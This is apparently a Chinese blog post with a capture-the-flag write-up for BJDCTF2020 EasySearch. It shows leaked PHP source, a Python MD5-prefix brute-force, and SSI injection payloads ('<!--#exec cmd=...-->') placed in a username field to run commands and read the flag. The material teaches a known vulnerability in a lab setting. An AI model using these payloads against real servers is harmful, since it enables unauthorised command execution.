[BJDCTF2020]EasySearch Apache SSI漏洞

最新推荐文章于 2024-02-17 12:51:12 发布
最新推荐文章于 2024-02-17 12:51:12 发布
阅读量467 收藏
点赞数
分类专栏: BUUctf 文章标签: apache 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133075926
版权

这道题有点意思 是SSI 漏洞

照样 我们先熟悉SSI漏洞是什么

SSI

服务端包含

SSI 提供了对现有html增加动态的效果

是嵌入 html的指令 只有网页被调用了 才会执行

允许执行命令 所以会造成rce

使用条件

当文件上传的时候 无法上传php

但是服务器开启了 SSI CGI支持

就可以通过 shtml文件上传


 Web 服务器已支持SSI(服务器端包含)
   

 Web 应用程序未对相关SSI关键字做过滤
    

 Web 应用程序在返回响应的HTML页面时,嵌入了用户输入

格式

<!--#exec cmd="ls /" -->

了解完了漏洞原理 我们开始做题

做题

打开网站 登入界面 我们会想到 弱口令 无果 sql注入 不存在注入点 robots.txt 不存在

于是我们看看是不是存在其他文件

我们使用dirsearch扫 无果 奇了怪了 完全不行啊

后面使用另一个工具才扫出来备份文件

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

直接代码审计 这里其实就两块

第一部分

        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6))

通过MD5加密后的值需要前6位和admin变量中一样

直接python代码

import hashlib

for i in range(100000000):
    hashe=hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if hashe[0:6]=="6d0bc1":
        print(i,hashe)
2020666 6d0bc1153791aa2b4e18b4f344f26ab4
2305004 6d0bc1ec71a9b814677b85e3ac9c3d40

随便选一个 作为密码登入即可

第二部分

 $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        }

创建一个 shtml后缀 对内容进行写入 内容是 username的内容 写入完成输出 header error

这里就是用上面的SSI 漏洞来做了

返回username

抓包 然后写入代码

<!--#exec cmd="ls /" -->

然后访问右边的路径

实现了rce

现在找flag就行了

<!--#exec cmd="ls ../" -->

<!--#exec cmd="cat ../f*" -->

学到了学到了 SSI 漏洞

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apache SSI教程文档
10-24
apache SSI教程文档,很详细,很好的参考资料.
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
SSI翻译成中文就是服务器端包含的意思,从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,下面给大家介绍下如何给Apache增加SSI支持
[BJDCTF2020]EasySearch
Yb_140的博客
10-28 785
信息收集+Apache SSI
[BJDCTF2020]EasySearch1 不会编程的崽
最新发布
不会编程的崽的博客
02-17 623
dirmap后台文件扫描,shtml ssl注入
配置Apache支持shtml(SSI)的方法
09-15
主要介绍了配置Apache支持shtml(SSI)的方法,需要的朋友可以参考下
apache ssi 使用例子
09-01
在技术上,SSI就是在静态HTML文件中,根据需求插入不同的内容。 例如一个article的频道,每一个article内页都生成一个静态的HTML,如此时,header某个位置需要修改,则需要重新生成所有article的静态HTML文件。 如...
apache SHTML网页SSI使用详解
01-11
方法一:下面是详细的设置apache支持shtml的设置步骤开启includes模块运行shtml 0、开启php环境安装目录 (我的为D:\wamp\Apache2\conf下) 的httpd.conf 文件中的(大概408-409行处): 1、 AddType text/...
第六十题——[BJDCTF2020]EasySearch
分享简单的安全技术
05-08 201
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,叫我们输入用户名与密码,使用dirsearch扫描出来index.php.swp目录,下载下来是源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt
[BJDCTF2020]EasySearch——ssi
m0_62879498的博客
05-14 445
[BJDCTF2020]EasySearch 1 和上一关相似 是 源码泄露 使用御剑对目录进行扫描 发现了 index.php.swp 0X01 源码分析 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 530
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
CVE-2017-15715漏洞SSI-RCE漏洞
07-27
CVE-2017-15715是一个存在于Apache Tomcat软件中的漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求,触发目标服务器上的远程代码执行。这个漏洞的影响范围是Tomcat 9.0.0.M1到9.0.0.M28版本(不包括9.0.0.M9版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值